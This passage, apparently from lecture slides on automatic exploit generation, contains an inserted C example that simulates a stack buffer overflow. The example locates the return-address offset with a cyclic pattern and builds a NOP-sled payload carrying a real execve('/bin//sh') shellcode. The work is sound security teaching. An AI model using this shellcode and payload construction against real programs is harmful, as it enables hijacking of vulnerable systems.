4. >_ Introduction
● Manual Exploit Generation
○ Locate the buffer that overflows and the address it is written at
○ Locate the return address
○ Construct the shellcode
● Automatic Exploit Generation
○ Automatically find vulnerabilities
○ Detect exploitable bugs
○ Generate exploits
5. >_ Introduction
● Challenges
○ Source code analysis alone is inadequate
■ char src[12], dst[10]; strncpy(dst, src, sizeof(src))
■ The overflow is visible in the source, but whether the two extra bytes reach anything exploitable (or only compiler padding) depends on the compiled stack layout
○ Infinite number of possible paths
■ Which paths should we check first?
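The following is an added example, not code from the slides: it carries out the three manual exploit-generation steps (locate the overflow, locate the return address, construct the shellcode) against a simulated Linux x86 stack frame, and also shows the slide-5 caveat that an overflow visible in the source may only reach compiler padding. The frame layout (64-byte buffer, 8 bytes of padding, saved EBP, saved EIP), the base address 0xbffff000 and the sled length are constructed assumptions; the shellcode is the widely published 23-byte execve("/bin//sh") sequence and is only stored and compared, never executed.

```c
/* Added example (not from the slides): the manual steps (locate the
 * overflow, locate the return address, construct the shellcode) run
 * against a simulated Linux x86 stack frame, plus the slide-5 caveat
 * that a source-visible overflow may only reach compiler padding.
 * Frame layout, padding and base address are constructed; the shellcode
 * is stored and compared, never executed. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define BUF_SIZE   64           /* char buf[64] in the vulnerable function */
#define PAD        8            /* padding the compiler left after buf (constructed) */
#define SLED_LEN   32           /* NOP sled in front of the shellcode */
#define FRAME_BASE 0xbffff000u  /* pretend address of buf (constructed) */

struct frame {                  /* lowest address first, as on x86 */
    unsigned char buf[BUF_SIZE], pad[PAD], saved_ebp[4];
    unsigned char ret_addr[4];  /* saved EIP: overwriting it hijacks control flow */
    unsigned char caller[256];  /* caller's frame: sled and shellcode land here */
};

/* Well-known 23-byte Linux x86 execve("/bin//sh") shellcode (never run here). */
static const unsigned char shellcode[] =
    "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
#define SHELLCODE_LEN (sizeof shellcode - 1)

static uint32_t le32_load(const unsigned char *p) {
    return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void le32_store(unsigned char *p, uint32_t v) {
    for (int i = 0; i < 4; i++) p[i] = (v >> (8 * i)) & 0xff;
}

/* The bug: input is copied into buf with no bounds check (strcpy-style). */
static void vulnerable_copy(struct frame *f, const unsigned char *in, size_t n) {
    if (n > sizeof *f) n = sizeof *f;   /* keep the simulation itself in bounds */
    memcpy((unsigned char *)f, in, n);  /* buf sits at offset 0 of the frame */
}

/* Slide 5: strncpy(dst, src, 12) into char dst[10] overflows in the source,
 * but here 2 extra bytes only hit padding. 1 if an n-byte write reaches EIP. */
static int overflow_reaches_eip(size_t n) {
    struct frame f; unsigned char in[sizeof f];
    memset(&f, 0, sizeof f); memset(in, 'A', sizeof in);
    vulnerable_copy(&f, in, n);
    return le32_load(f.ret_addr) != 0;
}

/* Step 1: cyclic pattern "Aa0Aa1Aa2..." where every 4-byte window is unique,
 * so the value that lands in EIP at the crash reveals its distance from buf. */
static void pattern_create(unsigned char *out, size_t len) {
    size_t n = 0;
    for (int i = 0; i < 26 && n < len; i++)
        for (int j = 0; j < 26 && n < len; j++)
            for (int k = 0; k < 10 && n < len; k++) {
                unsigned char chunk[3] = { 'A' + i, 'a' + j, '0' + k };
                for (int c = 0; c < 3 && n < len; c++) out[n++] = chunk[c];
            }
}

/* Step 2: map the EIP value seen at the crash back to its offset in the pattern. */
static long pattern_offset(const unsigned char *pat, size_t len, uint32_t eip) {
    unsigned char needle[4];
    le32_store(needle, eip);
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0) return (long)i;
    return -1;
}

/* Crash the simulated target with the pattern, recover the offset of EIP. */
static long locate_return_offset(void) {
    struct frame f; unsigned char pat[sizeof f];
    pattern_create(pat, sizeof pat);
    memset(&f, 0, sizeof f);
    vulnerable_copy(&f, pat, sizeof pat);
    return pattern_offset(pat, sizeof pat, le32_load(f.ret_addr));
}

/* Step 3: [filler][ret -> sled][NOP sled][shellcode]; returns payload length. */
static size_t build_payload(unsigned char *out, size_t ret_off, uint32_t ret) {
    memset(out, 'A', ret_off);
    le32_store(out + ret_off, ret);
    memset(out + ret_off + 4, 0x90, SLED_LEN);
    memcpy(out + ret_off + 4 + SLED_LEN, shellcode, SHELLCODE_LEN);
    return ret_off + 4 + SLED_LEN + SHELLCODE_LEN;
}

/* Deliver the payload, then follow the hijacked return: 1 if EIP lands in
 * the sled and sliding over the NOPs reaches the shellcode, else 0. */
static int simulate_hijack(void) {
    struct frame f; unsigned char payload[sizeof f];
    long off = locate_return_offset();
    if (off < 0) return 0;
    uint32_t ret = FRAME_BASE + (uint32_t)off + 4 + SLED_LEN / 2;  /* middle of the sled */
    size_t n = build_payload(payload, (size_t)off, ret);
    memset(&f, 0, sizeof f);
    vulnerable_copy(&f, payload, n);
    uint32_t eip = le32_load(f.ret_addr);
    if (eip < FRAME_BASE || eip - FRAME_BASE >= sizeof f) return 0;
    const unsigned char *pc = (const unsigned char *)&f + (eip - FRAME_BASE);
    const unsigned char *end = (const unsigned char *)&f + sizeof f;
    while (pc < end && *pc == 0x90) pc++;               /* slide down the NOPs */
    return (size_t)(end - pc) >= SHELLCODE_LEN && !memcmp(pc, shellcode, SHELLCODE_LEN);
}
```

In this layout `locate_return_offset()` recovers 76 (64 bytes of buffer, 8 of padding, 4 of saved EBP), `overflow_reaches_eip(66)` returns 0 because a two-byte overrun stops inside the padding, and `simulate_hijack()` returns 1 because the overwritten EIP points into the sled and slides onto the shellcode. Aiming at the middle of the sled is the usual way to tolerate a small error in the guessed stack address; on a real target the frame base would come from a debugger rather than a constant, and the slide-7 conditions (no NX, no ASLR) are what make a fixed stack address usable at all.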
7. >_ Overview
● Condition
○ Stack overflow or format string
○ Overwrite the return address to hijack control flow
○ Does not handle common security defenses such as NX or ASLR
○ Source code is needed
○ Linux x86